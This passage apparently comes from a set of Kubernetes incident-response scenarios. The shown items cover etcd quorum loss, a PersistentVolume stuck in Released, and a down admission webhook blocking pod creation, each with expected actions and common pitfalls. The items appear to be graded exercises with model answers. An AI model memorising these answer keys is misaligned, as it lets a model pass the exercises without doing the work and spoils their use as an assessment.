- Do NOT restart or delete etcd members hastily — this can cause permanent data loss - Identify which etcd member has the most recent and consistent data by checking revision numbers - If one healthy member exists, restore quorum by removing the corrupted members and re-adding them with fresh data directories - If no member is healthy, restore from the most recent etcd snapshot (check automated backup location) - If no snapshot exists, attempt to recover data from the etcd data directory of the most recent member using etcdctl snapshot save - Once etcd quorum is restored, verify the Kubernetes API server reconnects and cluster state is consistent - Implement automated etcd snapshots (every 30 minutes minimum) stored off-cluster - Add etcd health monitoring with alerts for member connectivity, leader elections, and revision delta between members

Common pitfalls

- Restarting all etcd members simultaneously, which can cause the cluster to form a new empty cluster - Deleting etcd data directories to "start fresh" — this destroys all cluster state (deployments, services, secrets) - Not having automated etcd backups — this turns a recoverable incident into a catastrophic data loss - Attempting the failed upgrade procedure again without understanding why it failed the first time

ir-scenario-059 — Kubernetes 🟡¶

A PersistentVolume backed by an EBS volume in AWS has become "stuck" in a Released state after its PersistentVolumeClaim was accidentally deleted. The PV contains 200 GB of production data for a StatefulSet (Elasticsearch data node). The StatefulSet pod is in Pending state because the PVC no longer exists and a new PVC cannot bind to the Released PV. The EBS volume still exists in AWS and the data is intact.

Expected actions

- Verify the EBS volume still exists and note its volume ID - Edit the PersistentVolume to remove the claimRef field, changing its status from Released to Available - Create a new PVC with the same name, storage class, and capacity that matches the PV - If using static provisioning, ensure the PV's persistentVolumeReclaimPolicy is set to Retain (not Delete) - Verify the PVC binds to the PV and the StatefulSet pod starts and mounts the volume - Check Elasticsearch cluster health to confirm the data node rejoins with its data intact - Add documentation for PV recovery procedures in the team runbook - Implement RBAC policies to restrict PVC deletion on production namespaces

Common pitfalls

- Deleting and recreating the PV, which may trigger EBS volume deletion if the reclaim policy is Delete - Creating a new PV pointing to the EBS volume without cleaning up the old PV, causing binding conflicts - Not setting the reclaim policy to Retain before any recovery operations - Forcing the StatefulSet to use a new empty PVC, losing the 200 GB of production data

ir-scenario-060 — Kubernetes 🔴¶

After a cluster upgrade, all new pod creations are failing with the error "Internal error occurred: failed calling webhook validate.policy.example.com: Post https://policy-webhook.policy-system: 443/validate: dial tcp: connect: connection refused." The validating admission webhook service is down because its pod was evicted during the upgrade and cannot be rescheduled — it has a node affinity rule for a node pool that was drained. Existing pods are running but nothing new can be created in any namespace, including system pods.

Expected actions

- Identify the failing admission webhook using kubectl get validatingwebhookconfigurations - Check if the webhook has a failurePolicy of Fail (blocking) — this is causing all pod creation to fail - As an emergency measure, either delete or patch the webhook configuration to set failurePolicy to Ignore - Fix the underlying issue — update the webhook deployment's node affinity to match available nodes - Verify the webhook pod can be scheduled and starts correctly - Restore the webhook's failurePolicy to Fail once the service is healthy - Add the webhook namespace to the webhook's namespaceSelector exclusion to prevent it from blocking its own recovery - Implement pre-upgrade checks that verify admission webhooks can tolerate node pool changes

Common pitfalls

- Not recognizing that a webhook with failurePolicy Fail can block ALL pod creation cluster-wide - Deleting the webhook configuration permanently instead of temporarily, removing a security control - Trying to fix the webhook pod without first unblocking pod creation (chicken-and-egg problem) - Not excluding the webhook's own namespace from its validation scope, which can cause self-blocking